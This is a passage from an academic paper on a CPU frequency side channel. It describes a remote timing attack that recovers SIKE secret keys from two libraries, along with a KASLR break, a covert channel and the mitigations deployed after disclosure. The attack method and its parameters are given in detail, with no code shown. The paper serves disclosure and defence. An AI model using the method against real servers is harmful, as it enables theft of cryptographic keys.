Frequency (GHz) 0.00 0.25 0.50 0.75 1.00 Probability mi = mi 1 mi mi 1 40 45 Power consumption (W) 0.0 0.1 0.2 0.3 Probability density mi = mi 1 mi mi 1 (b) PQCrypto-SIDH data Figure 9: Distribution of the power consumption and the fre- quency when the challenge ciphertext introduces an anoma- lous 0 (mi 6= mi−1) or not (mi = mi−1), using the setups from Section 4 on our i7-9700 CPU. The results are over 10 ran- domly generated keys, where, for each key, we target 4 out of the 378 bit positions. For each key and each bit, we launch the server with 300 goroutines (CIRCL) or pthreads (PQCrypto- SIDH), each of which handles a single decapsulation request. have elapsed. As in Section 4, we run each experiment in two setups. In the first setup, we use the default system con- figuration, and monitor the steady-state CPU frequency. In the second setup, we disable SpeedStep/HWP (this way, our CPU stays at the base frequency during the experiment) and monitor (core domain) power consumption. We sample both the CPU frequency and the power consumption every 1 ms. We group the measured data points according to whether we expect the challenge ciphertext to induce an anomalous 0 or not. For each key m and target bit position i, exactly one of m and m 0 contributes to the anomalous-0 grouping. The results, shown in Figures 9a and 9b, confirm that the steady-state frequency is higher and the power consump- tion is lower when an anomalous 0 is triggered (mi 6= mi−1) than when it is not (mi = mi−1), for both the CIRCL and the PQCrypto-SIDH decapsulation servers. As noted above, both these libraries are hardened against previously known software side channels and meant to run in constant time. The signal we obtain from PQCrypto-SIDH is fainter than the one we obtain from CIRCL, because PQCrypto-SIDH uses a different strategy for Montgomery reduction that causes the value 0 to be represented in memory sometimes as 0 and sometimes as a prime number of size 751 bits. 5.2 SIKE Key Remote Recovery We now show that the secret-dependent power consumption and frequency differences observed in Section 5.1 translate to a remotely observable secret-dependent timing difference. We configure a SIKE target server with a randomly gen- erated static 378-bit key for SIKE-7517 , revealed for com- parison only after the attack completes. Our server accepts a client decapsulation request over HTTP (Go) or TCP (C) and spawns a goroutine (Go) or pthread (C) to handle the request. The thread reads in the ciphertext and performs the decapsula- tion computation, after which it sends a message back to the client indicating the establishment of a shared secret but no other information. The target server and the attacker are both connected to the same network, and we measure an average round-trip time of 688 µs between the two machines. The attacker simultaneously sends n requests with a chal- lenge ciphertext meant to trigger an anomalous 0 and mea- sures the time t it takes to receive responses for all n re- quests. When an anomalous 0 is triggered, power decreases, frequency increases, SIKE decapsulation executes faster, and t should be smaller. Based on the observed t and the previously recovered secret key bits, the attacker can infer the value of the target bit, then repeat the attack for the next bit. For the attack to be successful, we must overcome a number of practical difficulties. First, we must set a value for n, the number of requests, that allows us to observe a clear timing signal when we trigger the anomalous 0s. We experimentally find an n big enough that the frequency increase is remotely observable, but not so big that we induce thrashing. Second, we must set a time cutoff to distinguish when anomalous 0s are triggered and when they are not. To this end, we collect the decapsulation times when querying the server with a random ciphertext, and use these times to set a cutoff for queries not triggering anomalous 0s. We then query the server with the challenge ciphertexts for the first few bits of the key until we see a speedup compared to the random ciphertext, and use these times to set a cutoff for queries triggering anomalous 0s. Third, we must detect and recover from mistakes caused by random variations in the server’s decapsulation time. Re- call that a challenge ciphertext constructed using a wrong value for the i least significant bits of m will never trigger anomalous 0s regardless of the relationship of mi and mi−1. Measuring no timing reduction in many consecutive rounds is evidence either that many consecutive key bits all have the same value (unlikely since key bits are independent and uniformly distributed), or that the value we are using for the least significant bits of the key is wrong (cf. Appendix A.4). In our experiments, we backtrack when experiments for 40 consecutive bit positions show no timing reduction. Finally, there is a chance that a challenge ciphertext con- structed as in Section 5.3.2 will accidentally trigger an anoma- lous 0 later in the decapsulation process even if it does not at the target bit index i of the Montgomery ladder. This will hap- 7The SIKE standard and the implementations we examined place the long-term keypair in the 3-torsion and the ephemeral key used for forming a ciphertext in the 2-torsion, so this is the case we studied. A variant of our attack applies also if the roles are swapped. 650 660 670 Time (ms) 0.00 0.05 0.10 0.15 Probability density mi = mi 1 mi mi 1 (a) CIRCL histogram 1550 1560 1570 1580 Time (ms) 0.00 0.05 0.10 Probability density mi = mi 1 mi mi 1 (b) PQCrypto-SIDH histogram Figure 10: Distribution of the timings measured by the at- tacker during the remote key extraction attack, with the server running on an i7-9700 CPU. The attacker makes 300 (CIRCL) and 1000 (PQCrypto-SIDH) connections (all with the same challenge ciphertext, constructed as per Section 5.3.2) and measures the time until the last connection completes. We group the execution time (filtered) of each key bit extraction based on whether it should have triggered an anomalous 0 in the Montgomery ladder (i.e., whether mi = 1−mi−1 or not). pen with exponentially small probability for most bit indices, but larger probability for the last few bit indices. We defer a detailed explanation to Appendix A.3. It may be possible to avoid triggering this misbehavior with a different way of constructing the challenge key. We instead sidestep it by stop- ping our interaction with the server after extracting all but the last 14 bits; we recover these last bits by brute-force search. Attack Setup We run the SIKE target server on our i7-9700 CPU using the default system configuration. In the attack on CIRCL, the server is an HTTP server written using Go’s net.http library, which handles each request in a goroutine. In the attack on PQCrypto-SIDH, the server is a TCP server written in C, which handles each request in a pthread. We configure the attacker to send n = 300 concurrent re- quests in the CIRCL case, and n = 1000 requests in the PQCrypto-SIDH case. In both cases, concurrent requests are sent all with the same challenge ciphertext (constructed as described in Section 5.3.2), and the attacker measures the time until the last connection completes. We experimentally determine the expected timings when the CPU frequency in- creases because of anomalous 0s and when it does not: for CIRCL, at most 660.2 ms and at least 662.5 ms, respectively; for PQCrypto-SIDH at most 1556 ms and at least 1558 ms, respectively. We repeat the measurement 400 times, exclude outliers (CIRCL: below 650 ms or above 675 ms; PQCrypto- SIDH: below 1500 ms or above 1580 ms), compute the me- dian of the remaining values, and compare to the cutoffs. If the result is inconclusive for a bit, we repeat the attack on that bit. We use our side channel to extract the key up to bit 364 and recover the last 14 bits by brute force search. Results In Figure 10a and Figure 10b, we show the timing distribution of the 300-connection runs (CIRCL) and 1000- connection runs (PQCrypto-SIDH) respectively, grouped ac- 0 3 6 9 12 15 18 Secret key bit index 660 661 662 663 Time (ms) mi mi 1 mi = mi 1 (a) CIRCL first 20 bits 345 348 351 354 357 360 363 Secret key bit index 660 661 662 663 Time (ms) mi mi 1 mi = mi 1 (b) CIRCL last 20 bits Figure 11: Median times used to extract the first 20 bits (0 to 19) and the last 20 bits (345 to 364) of the key for the same attack against CIRCL SIKE-751 as in Figure 10a. The timings depend on whether the challenge ciphertext triggered an anomalous 0 (mi 6= mi−1) or not (mi = mi−1). 0 3 6 9 12 15 18 Secret key bit index 1554 1556 1558 1560 Time (ms) mi mi 1 mi = mi 1 (a) PQCrypto-SIDH first 20 bits 345 348 351 354 357 360 363 Secret key bit index 1556 1558 Time (ms) mi mi 1 mi = mi 1 (b) PQCrypto-SIDH last 20 bits Figure 12: Median times used to extract the first 20 bits (0 to 19) and the last 20 bits (345 to 364) of the key for the same attack against PQCrypto-SIDH SIKE-751 as in Figure 10b. The timings depend on whether the challenge ciphertext trig- gered an anomalous 0 (mi 6= mi−1) or not (mi = mi−1). cording to whether the challenge ciphertext of that run trig- gered an anomalous 0 (mi 6= mi−1) or not (mi = mi−1). For the first and the last 20 bit positions of the key that we extract by interacting with the server (bits 0–19 and 345–364, respectively), we plot, in Figure 11 (CIRCL) and Figure 12 (PQCrypto-SIDH), the median time among the 400 measure- ments for that bit and whether the run triggered an anoma- lous 0 (mi 6= mi−1) or not (mi = mi−1) at that bit position. The signal is strong for both the top bits and the bottom bits. Both attacks successfully recovered the full secret key. The attack on CIRCL completed in 36 hours, while the attack on PQCrypto-SIDH completed in 89 hours. We expect that the at- tack running time could be reduced with careful optimization. Unlike our attack on CIRCL, our attack on PQCrypto-SIDH made 1 mistake and needed to backtrack; see Appendix A.4 for our error correction strategy. 5.3 Anomalous 0s in SIKE Decapsulation We now explain how an attacker can construct SIKE cipher- texts that trigger an anomalous 0 in the (i + 1)st iteration of the Montgomery ladder when mi 6= mi−1, and why that anomalous 0, once generated, causes the remainder of the decapsulation algorithm to also produce 0s repeatedly. We briefly recall some relevant mathematical background in Appendix A.2. We recommend that readers review a longer introduction to the math behind elliptic curves, isogenies, and SIKE; Costello’s tutorial expositions of elliptic curves [18] and isogenies [19] are especially good choices. The first subroutine in the SIKE decapsulation algorithm recovers (the Montgomery coefficient A of) the curve E 0 0 on which the points P, Q, and Q−P, included in the ciphertext provided by the attacker, lie. This subroutine is fast and inde- pendent of the secret key; we do not consider it further. The second subroutine uses the Montgomery three-point ladder to compute P + [m]Q on the curve E 0 0 recovered by the first subroutine. This is the subroutine in which a correct key-bit guess (mi 6= mi−1) can trigger the generation of an anomalous 0 value. We explain how in Section 5.3.2. The third subroutine evaluates the isogeny corresponding to the point P + [m]Q, computing (the Montgomery coeffi- cient of) the curve E 0 e3 that is the image of E 0 0 under that isogeny. The fourth subroutine computes the j-invariant of the curve E 0 e3 ; this j-invariant is the shared SIDH secret. In Sec- tion 5.3.3 and Appendix A.3, we explain how an anomalous 0 value output by the Montgomery ladder causes the isogeny evaluation (third subroutine) and the j-invariant computation (fourth subroutine) to produce additional anomalous 0s. The final step in SIKE decapsulation is a Fujisaki–Okamoto consistency check [31, 44] that checks that the ciphertext was properly generated. If the check fails, the recipient generates a random session key instead of the one prescribed by the (invalid) ciphertext. The Fujisaki–Okamoto check immunizes SIKE against attacks, such as that due to Galbraith et al. [32], that require partial information about the j-invariant computed when decapsulating (invalid) ciphertexts. We do not claim to invalidate SIKE’s proof of security. None of the ciphertexts we construct in our attack passes the Fujisaki–Okamoto check. Nevertheless, our attack recovers the server’s secret key, because we obtain the information we need from the running time of the subroutines performed before the Fujisaki–Okamoto check. While our paper was under embargo (cf. Section 1), our chosen-ciphertext attack triggering anomalous 0s in SIKE decapsulation, described in this subsection, was independently rediscovered by De Feo et al. [25]. 5.3.1 Affine and Projective X-Coordinate Point Repre- sentations on Montgomery Curves A Montgomery curve is defined by the equation EA,B : By2 = x 3 + Ax2 + x, with parameters A,B ∈ Fp 2 such that B(A 2 − 4) 6= 0. Montgomery curves have properties that make them suitable for efficient, side-channel resistant implementations. In particular, many operations needed in cryptography can be computed using just the x-coordinate of a point (ignoring the y-coordinate) and just the curve parameter A (ignoring the curve parameter B). The point with x- and y-coordinate Algorithm 1: Three point ladder ( [52], Appendix A) 1 function Ladder3pt Input: m = (m`−1,...,m0)2 ∈ Z, (xP, xQ, xQ−P), and (A : 1) Output: Consider the algorithm xADD that, given points U,V, and W in projective x-coordinate form where W = U −V, computes the point U +V in projective x-coordinate form, as: X ← ZW - (XU −ZU )(XV +ZV ) + (XU +ZU )(XV −ZV ) 2 Z ← XW - (XU −ZU )(XV +ZV )−(XU +ZU )(XV −ZV ) 2 . When U −V is any point except O or T, xADD(U,V,U −V) correctly returns U +V. However, when U −V is O or T, xADD(U,V,U −V) misbehaves and returns the invalid projec- tive representation (0 : 0) instead of U +V [21].9 Worse, xADD(U,V,W) will also return (0 : 0) if called with any of U, V, or W equal to (0 : 0), regardless of the value of the other two inputs.10 Repeated applications of xADD can thus get stuck at (0 : 0). We use exactly this fact for our attack. Suppose that we can arrange that, at the beginning of iter- ation k in Ladder3pt, (X2 : Z2) ∼ T, i.e., that X2 = 0 and Z2 is nonzero. There are 2 cases to consider: • if mk = 1, then T will be passed into the third argument of xDBLADD, triggering the misbehavior in xADD and causing (X1 : Z1) to be set to (0 : 0). • otherwise, if mk = 0, then T will instead be passed into the second argument of xDBLADD. This will not trigger the misbehavior in xADD and not produce (0 : 0) as an output. The point (X2 : Z2), which was equal to T, will be overwritten with whatever xADD returns. In the first case, xADD will get stuck; the second element of the tuple returned by xDBLADD will be (0 : 0) in every subsequent iteration of Ladder3pt’s loop, and Ladder3pt will eventually return (0 : 0). In the second case, it is likely that 0 values will not recur during the ladder computation. It remains to show how the attacker can arrange for(X2 : Z2) to equal T at loop iteration k. Let 𝜇i = (mi−1,...,m0)2 rep- resent the least significant i bits of m. Algorithm Ladder3pt maintains the invariant that, at the beginning of iteration i of the loop, the points (X0 : Z0), (X1 : Z1), and (X2 : Z2) satisfy (X0 : Z0) ∼ [2 i ]Q (X1 : Z1) ∼ P+[𝜇i ]Q (X2 : Z2) ∼ (X0 : Z0)−(X1 : Z1) . Suppose that that the attacker, proceeding bit-by-bit, has ex- tracted 𝜇k. The attacker picks an arbitrary curve and sets Q to be an arbitrary point on the curve. If mk−1 = 0, the attacker sets P ← - 2 k − 𝜇k Q−T . (1) 9 If U −V = O then U = V and therefore (XU : ZU ) ∼ (XV : ZV ). If U −V = T then U = 𝜏T (V) where 𝜏T is the translation-by-T map; by a property of Montgomery curves, it follows that (XU : ZU ) ∼ (ZV : XV ). 10In this case it does not matter— indeed, does not make sense to ask— whether W = U −V. Then, at iteration k of the Ladder3pt loop, we will have (X2 : Z2) ∼ T. If mk = 1, T will be passed as the third argument to xDBLADD, triggering the misbehavior as described above. If mk−1 = 1, the attacker instead sets P ← T − - 𝜇k Q . (2) Then, at iteration k of the Ladder3pt loop, we will have (X1 : Z1) ∼ T. If mk = 0, T will be passed as the third argument to xDBLADD, triggering the misbehavior. To summarize, if mk 6= mk−1, the crafted input ciphertext will trigger the anomalous 0 misbehavior. When generated according to the SIKE specification, P and Q are always linearly independent points of order 3 e3 and never produce T or O during the execution of Ladder3pt. When generated according to our algorithm above but with an incorrect key-bit guess, we expect that T or O will be produced only with negligible probability.11 This conjecture is supported by our experiments. 5.3.3 Anomalous 0s in Isogeny Evaluation and j- Invariant Calculation The next task in SIKE decapsulation, isogeny evaluation, is carried out by algorithm 3_e_iso, which takes as input the point P + [m]Q (in projective x-coordinate form) as output by Ladder3pt, expecting it to be a point of exact order 3 e3 . In Appendix A.3, we show that, when invoked on the invalid input (0 : 0), 3_e_iso and its subroutines repeatedly operate on and produce 0 values. Isogeny evaluation in 3_e_iso thus acts as an amplifier for the signal produced by the ladder evaluation in Ladder3pt, making it possible to observe even an anomalous 0 produced in a late Ladder3pt loop iteration. After isogeny evaluation, the next task in SIKE decapsula- tion is j-invariant calculation, using algorithm jInvariant. When 3_e_iso returns (0 : 0), jInvariant is invoked with input (0 : 0), every intermediate value it computes is 0, and its return value (the SIDH shared secret) is 0.12 5.4 Mitigations We now describe the mitigation that Cloudflare and Microsoft deployed after we disclosed our attack on SIKE. The mitigation, which was originally proposed by De Feo et al. [25], consists of validating that the ciphertext (public key) consists of a pair of linearly independent points of the correct order 3 e3 . This check is performed before running the three-point ladder and prevents attack ciphertexts from being further processed, thus hindering the attack. When running decapsulation on a single thread on our i7-9700 CPU, we 11This fact allows us not only to distinguish a correct from an incorrect bit guess for bit mk but also to detect and recover from mistakes in determining the earlier bits 𝜇k; see Appendix A.4. 12Note that this output depends on the result of inverting 0 in Fp 2 in step 15 of jInvariant. The Montgomery inversion algorithms in the implementa- tions we examined have 1/0 = 0 (see Savas and Koç [83]). found that the mitigation adds a performance overhead of 5% for CIRCL and of 11% for PQCrypto-SIDH. 6 Timer-free Attacks We now show that not only can we use the frequency side channel to turn power attacks into remote timing attacks (as we saw in Section 5), but we can also use it to mount timing attacks without a timer. To this end, we use the frequency side channel to mount a KASLR break and a covert channel. KASLR Break Like prior work [12,13,37,43,45,51,63,64], the goal of the (unprivileged) attacker is to de-randomize the kernel base address. Knowledge of the kernel base address is useful to mount memory corruption exploits. In Linux, the kernel text is placed at a 2 MB boundary in the 0xffffffff80000000 – 0xffffffffc0000000 range [13]. Hence, the kernel can be placed at one of 512 possible offsets. Prior work has shown that, on Intel and AMD processors, there is a timing and power consumption difference when ex- ecuting prefetch instructions on a memory address depending on whether that address is mapped or not [43, 63]. This dif- ference can be used to infer the location of the kernel within its predefined region. We show that this power consumption difference manifests also as a CPU frequency difference. To this end, we build a sender process similar to the ones of Figure 3, but using only prefetcht0 instructions. While the sender runs, a separate thread measures the current CPU frequency using the unprivileged scaling_cur_freq inter- face from the cpufreq driver. We ran the sender with all the 512 possible kernel base addresses, for 10 different ran- domizations (i.e., repeating across 10 reboots) on our Intel i7-9700 CPU. In all 10 cases, we were able to identify the base address successfully (as verified by checking the privi- leged /proc/kallsyms interface). We measured an average steady-state CPU frequency of 4.04 GHz when repeatedly prefetching mapped addresses, and 4.24 GHz when repeat- edly prefetching unmapped addresses. The runtime of our un- optimized, proof-of-concept implementation is of 2 minutes. This runtime is larger than state-of-the-art KASLR breaks, but could be reduced with additional engineering effort. Covert Channel Like prior work, our covert channel uses a sender and a receiver. To transmit a 0, the sender executes a loop of or instructions with high HD and HW in their data flow. This loop increases the power consumption and results in lower CPU frequency values. To transmit a 1, the sender executes a loop of shlx instructions with low HD and HW in their data flow. This loop decreases the power consumption and results in higher CPU frequency values. The receiver measures the current CPU frequency using the unprivileged scaling_cur_freq interface from the cpufreq driver. We evaluated our covert channel by transmitting 1 kB of random data on our i7-9700 CPU. Our unoptimized, proof- of-concept implementation achieved a bandwidth of 30 bps with an error rate of 0.03% (average across 10 runs). This bandwidth is similar to the one of prior covert channels relying on software-based power measurement interfaces [63, 64]. 7 Discussion Affected CPUs We successfully reproduced our attack on Intel CPUs from the 8th to the 11th generation of the Core microarchitecture (reported in Table 1). We also tested two desktop CPUs from older generations, namely the i7-6700K (Skylake) and i7-7700K (Kaby Lake), and we found that both models only support Turbo frequencies on single core work- loads: as soon as more than 1 core is active, the P-state is capped at the base frequency. In our experiments, we were not able to force the frequency into steady state (i.e., below the max turbo frequency) with single-core workloads, and were therefore unable to reproduce our attack on these models. Besides CPUs from the (client-class) Core microarchitec- ture, our attack should also work on Intel Xeon CPUs (server- class) since they also use similar P-state management tech- niques. Additionally, other CPU vendors implement similar DVFS mechanisms and are likely vulnerable. For example, we verified that the AMD Ryzen processors are also vulnera- ble to our attack, featuring a similar HW/HD leakage model and enabling the same SIKE vulnerability that we described in Section 5. We leave reverse engineering the specific char- acteristics of the AMD leakage model to future work. Mitigating Leakage via the Frequency Channel Our at- tack is enabled by data-dependent frequency adjustments at steady state. As we showed, the affected CPUs enter this state when certain power and thermal limits are hit during a work- load’s execution. Thus, one approach to mitigate the attack is to reduce the likelihood that the CPU hits these limits. One workload-independent way to do so is to either disable Turbo Boost, or to disable SpeedStep and HWP from the BIOS. We verified that, with otherwise standard system configurations, both methods cause the frequency to stay fixed at the base frequency during workload execution and never enter steady state, preventing leakage via the frequency side channel. How- ever, this approach significantly reduces system performance. Moreover, this approach may not be sufficient on system con- figurations with custom power limits. Indeed, in concurrent work, Liu et al. show that a privileged adversary can extract AES-NI keys using the frequency side channel after reducing the power limits to fractions of their default values [65]. Mitigating Leakage in Ciphers Another mitigation strat- egy consists of removing secret-dependent leakage in crypto- graphic software. For example, SIKE’s mitigation discussed in Section 5.4 hinders our attack by preventing attack cipher- texts from triggering secret-dependent computations on 0s. For cryptographic software in general, mitigating the power leakage itself would naturally close the frequency channel. True decoupling would require that all operands have no sta- tistical correlation with secrets, which is only feasible with techniques like fully homomorphic encryption. A more realis- tic approach takes advantage of the fact that it is not the power usage of each operand that is leaked, but an average of the power usage across all operands in a time period. This goal may be achieved using masking/blinding techniques. Prior works have introduced protocol-specific masking techniques for ciphers such as AES [8,38,82,86] and blinding techniques for elliptic-curve cryptography [54]. Automatic masking tech- niques have also been proposed either in software [7, 17, 27] or leveraging additional hardware support [26, 33, 41, 42, 79]. However, masked/blinded implementations may still leak in practice via power side channels [4, 5, 34, 69, 81, 84, 85]. Future defenses could also examine the potential of fus- ing unrelated loops, vectorizing operations, or other meth- ods of interleaving different computations. These approaches could be done by combining multiple, normally sequential, computations in the program or by introducing an additional complementary kernel. Effective blinding will require that the combined computation’s power trace is not related to any secret computation. For example, if we can construct a bit- inverted version of a cryptographic kernel, we can interleave the real kernel and the blinding kernel. Our model of HW and HD provides a starting point for future work on blinding. 8 Conclusion We discovered that in modern Intel (and AMD) x86 CPUs, DVFS-induced frequency variations depend on the current power consumption, and hence on the data being processed. We showed, for the first time, that the HD and HW of data individually and non-uniformly contribute to power consump- tion and frequency on modern x86 CPUs. We described a novel chosen-ciphertext attack against SIKE, which uses this knowledge to leak full cryptographic keys via remote timing. The security implications of our findings are significant. Not only do they expand the attack surface of power side- channel attacks by removing the need for power measurement interfaces, but they also show that, even when implemented as constant time, cryptographic code can still leak via remote timing analysis. The takeaway is that current cryptographic engineering practices for how to write constant-time code are no longer sufficient to guarantee constant time execution of software on modern, variable-frequency processors. Acknowledgments This work was funded in part through NSF grants 1942888 and 1954521, and gifts from Google, Mozilla, and Qualcomm. Wang was partly supported by a Packard Fellowship (via Brent Waters). We thank our shepherd Michael Schwarz and the anonymous reviewers for their valuable feedback. Availability We have open sourced the code of all the experiments of this paper at https://github.com/FPSG-UIUC/hertzbleed. References [1] Andreas Abel and Jan Reineke. uops.info: Characterizing latency, throughput, and port usage of instructions on Intel microarchitectures. In ASPLOS, 2019. [2] Andreas Abel and Jan Reineke. uiCA: Accurate throughput prediction of basic blocks on recent Intel microarchitectures. In ICS, 2022. [3] Ross Anderson. Security Engineering: A Guide to Building Dependable Distributed Systems, 3rd Edition. John Wiley & Sons, 2020. [4] Josep Balasch, Benedikt Gierlichs, Vincent Grosso, Oscar Reparaz, and François-Xavier Standaert. On the cost of lazy engineering for masked software implementations. In CARDIS, 2014. [5] Sven Bauer. Attacking exponent blinding in RSA without CRT. In COSADE, 2012. [6] Daniel J. Bernstein and Tanja Lange. Montgomery curves and the Montgomery ladder. In Topics in Computational Number Theory Inspired by Peter L. Montgomery. Cambridge University Press, 2017. [7] Alex Biryukov, Daniel Dinu, Yann Le Corre, and Aleksei Udovenko. Optimal first-order boolean masking for embedded iot devices. In CARDIS, 2017. [8] Johannes Blömer, Jorge Guajardo, and Volker Krummel. Provably secure masking of AES. In SAC, 2004. [9] Eric Brier, Christophe Clavier, and Francis Olivier. Correlation power analysis with a leakage model. In CHES, 2004. [10] Len Brown. powercap: restrict energy meter to root access. https: //git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin ux.git/commit/?id=949dd0104c496fa7c14991a23c03c62e4463 7e71, 2020. Accessed on Jun 7, 2022. [11] Ileana Buhan, Lejla Batina, Yuval Yarom, and Patrick Schaumont. SoK: Design tools for side-channel-aware implementions. In ASIACCS, 2022. [12] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. Fallout: Leaking data on Meltdown-resistant CPUs. In CCS, 2019. [13] Claudio Canella, Michael Schwarz, Martin Haubenwallner, Martin Schwarzl, and Daniel Gruss. KASLR: Break it, fix it, repeat. In ASIACCS, 2020. [14] Suresh Chari, Charanjit Jutla, Josyula R Rao, and Pankaj Rohatgi. A cautionary note regarding evaluation of AES candidates on smart-cards. In AES2, 1999. [15] Yimin Chen, Xiaocong Jin, Jingchao Sun, Rui Zhang, and Yanchao Zhang. POWERFUL: Mobile app fingerprinting via power analysis. In INFOCOM, 2017. [16] Jean-Sébastien Coron. Resistance against differential power analysis for elliptic curve cryptosystems. In CHES, 1999. [17] Jean-Sébastien Coron, Johann Großschädl, Mehdi Tibouchi, and Praveen Kumar Vadnala. Conversion from arithmetic to boolean mask- ing with logarithmic complexity. In FSE, 2015. [18] Craig Costello. Pairings for beginners. Online: https://www.craigc ostello.com.au/s/PairingsForBeginners.pdf, 2012. [19] Craig Costello. Supersingular isogeny key exchange for beginners. In SAC, 2019. [20] Craig Costello. The case for SIKE: A decade of the supersingular isogeny problem. Cryptology ePrint Archive, Report 2021/543, 2021. [21] Craig Costello and Benjamin Smith. Montgomery curves and their arithmetic - the case of large characteristic fields. J. Cryptogr. Eng., 8(3), 2018. [22] Ian Cutress. Why Intel processors draw more power than expected: TDP and Turbo explained. https://www.anandtech.com/show/1 3544/why-intel-processors-draw-more-power-than-expec ted-tdp-turbo, 2018. Accessed on Jun 7, 2022. [23] Luca De Feo. Mathematics of isogeny based cryptography. Preprint, arXiv:1711.04062 [cs.CR], 2017. [24] Luca De Feo. Exploring isogeny graphs. Habilitation thesis, Université de Versailles Saint-Quentin-en-Yvelines, 2018. [25] Luca De Feo, Nadia El Mrabet, Aymeric Genêt, Novak Kaluderovi ¯ c,´ Natacha Linard de Guertechin, Simon Pontié, and Élise Tasso. SIKE channels. Cryptology ePrint Archive, Report 2022/054, 2022. [26] Elke De Mulder, Samatha Gummalla, and Michael Hutter. Protecting RISC-V against side-channel attacks. In DAC. IEEE, 2019. [27] Hassan Eldib and Chao Wang. Synthesis of masking countermeasures against side channel attacks. In CAV, 2014. [28] Armando Faz-Hernández and Kris Kwiatkowski. Introducing CIRCL: An Advanced Cryptographic Library. Cloudflare, 2019. https://gi thub.com/cloudflare/circl. Accessed on Jun 7, 2022. [29] Armando Faz-Hernández, Julio López, Eduardo Ochoa-Jiménez, and Francisco Rodríguez-Henríquez. A faster software implementation of the supersingular isogeny Diffie-Hellman key exchange protocol. IEEE Transactions on Computers, 67(11), 2018. [30] Pierre-Alain Fouque and Frédéric Valette. The doubling attack–why upwards is better than downwards. In CHES, 2003. [31] Eiichiro Fujisaki and Tatsuaki Okamoto. Secure integration of asym- metric and symmetric encryption schemes. Journal of Cryptology, 26(1), 2013. [32] Steven D. Galbraith, Christophe Petit, Barak Shani, and Yan Bo Ti. On the security of supersingular isogeny cryptosystems. In ASIACRYPT, 2016. [33] Si Gao, Johann Großschädl, Ben Marshall, Dan Page, Thinh Pham, and Francesco Regazzoni. An instruction set extension to support software-based masking. Cryptology ePrint Archive, Report 2020/773, 2020. [34] Si Gao, Ben Marshall, Dan Page, and Elisabeth Oswald. Share-slicing: Friend or foe? TCHES, 2020. [35] Daniel Genkin, Lev Pachmanov, Itamar Pipman, Eran Tromer, and Yuval Yarom. ECDSA key extraction from mobile devices via nonin- trusive physical side channels. In CCS, 2016. [36] Daniel Genkin, Itamar Pipman, and Eran Tromer. Get your hands off my laptop: Physical side-channel key-extraction attacks on PCs. In CHES, 2014. [37] Enes Göktas, Kaveh Razavi, Georgios Portokalidis, Herbert Bos, and Cristiano Giuffrida. Speculative probing: Hacking blind in the Spectre era. In CCS, 2020. [38] Jovan D Golic and Christophe Tymen. Multiplicative masking and ´ power analysis of AES. In CHES, 2002. [39] Louis Goubin and Jacques Patarin. DES and differential power analysis the “duplication” method. In CHES, 1999. [40] Corey Gough, Ian Steiner, and Winston Saunders. Energy Efficient Servers: Blueprints for Data Center Optimization. Apress, 2015. [41] Hannes Groß, Manuel Jelinek, Stefan Mangard, Thomas Unterluggauer, and Mario Werner. Concealing secrets in embedded processors designs. In CARDIS, 2016. [42] Hannes Groß, Stefan Mangard, and Thomas Korak. Domain-oriented masking: Compact masked hardware implementations with arbitrary protection order. In TIS, 2016. [43] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Mangard. Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR. In CCS, 2016. [44] Dennis Hofheinz, Kathrin Hövelmanns, and Eike Kiltz. A modular analysis of the Fujisaki-Okamoto transformation. In TCC, 2017. [45] Ralf Hund, Carsten Willems, and Thorsten Holz. Practical timing side channel attacks against kernel space ASLR. In S&P, 2013. [46] Intel. Running average power limit energy reporting / cve-2020-8694 , cve-2020-8695 / intel-sa-00389. https://www.intel.com/conten t/www/us/en/developer/articles/technical/software-secu rity-guidance/advisory-guidance/running-average-power- limit-energy-reporting.html. Accessed on Jun 7, 2021. [47] Intel. Thermal design power (TDP) in Intel processors. https://www. intel.com/content/www/us/en/support/articles/000055611 /processors.html. Accessed on Jun 7, 2022. [48] Intel. Intel 64 and IA-32 Architectures Optimization Reference Manual, June 2021. [49] Intel. Intel 64 and IA-32 Architectures Software Developer’s Manual, June 2021. [50] Intel. Power management - technology overview. https://builders .intel.com/docs/networkbuilders/power-management-techn ology-overview-technology-guide.pdf, 2021. Accessed on Jun 7, 2022. [51] Yeongjin Jang, Sangho Lee, and Taesoo Kim. Breaking kernel address space layout randomization with Intel TSX. In CCS, 2016. [52] David Jao, Reza Azarderakhsh, Matthew Campagna, Craig Costello, Luca De Feo, Basil Hess, Amir Jalali, Brian Koziel, Brian LaMacchia, Patrick Longa, Michael Naehrig, Joost Renes, Vladimir Soukharev, David Urbanik, Geovandro Pereira, Koray Karabina, and Aaron Hutchinson. SIKE. Technical report, National Institute of Standards and Technology, 2020. [53] David Jao and Luca De Feo. Towards quantum-resistant cryptosystems from supersingular elliptic curve isogenies. In PQCrypto, 2011. [54] Marc Joye and Christophe Tymen. Protections against differential analysis for elliptic curve cryptography. In CHES, 2001. [55] Manuel Kalmbach, Mathias Gottschlag, Tim Schmidt, and Frank Bel- losa. TurboCC: A practical frequency-based covert channel with Intel Turbo Boost. Preprint, arXiv:2007.07046 [cs.CR], 2020. [56] Nikolaos Kavvadias, Periklis Neofotistos, Spiridon Nikolaidis, CA Kos- matopoulos, and Theodore Laopoulos. Measurements analysis of the software-related power consumption in microprocessors. IEEE Trans- actions on Instrumentation and Measurement, 53(4), 2004. [57] Colin Ian King. stress-ng. https://github.com/ColinIanKing/ stress-ng, 2022. Accessed on Jun 7, 2022. [58] Paul Kocher. Timing attacks on implementations of Diffie-Hellman, RSA, DSS, and other systems. In CRYPTO, 1996. [59] Paul Kocher, Joshua Jaffe, and Benjamin Jun. Differential power anal- ysis. In CRYPTO, 1999. [60] Yann Le Corre, Johann Großschädl, and Daniel Dinu. Micro- architectural power simulator for leakage assessment of cryptographic software on ARM Cortex-M3 processors. In COSADE, 2018. [61] Sheayun Lee, Andreas Ermedahl, Sang Lyul Min, and Naehyuck Chang. An accurate instruction-level energy consumption model for embedded RISC processors. ACM SIGPLAN Notices, 36(8), 2001. [62] Linux. aperfmperf.c. https://git.kernel.org/pub/scm/lin ux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/ cpu/aperfmperf.c. Accessed on Jun 7, 2022. [63] Moritz Lipp, Daniel Gruss, and Michael Schwarz. AMD prefetch attacks through power and time. In USENIX Security, 2022. [64] Moritz Lipp, Andreas Kogler, David Oswald, Michael Schwarz, Cather- ine Easdon, Claudio Canella, and 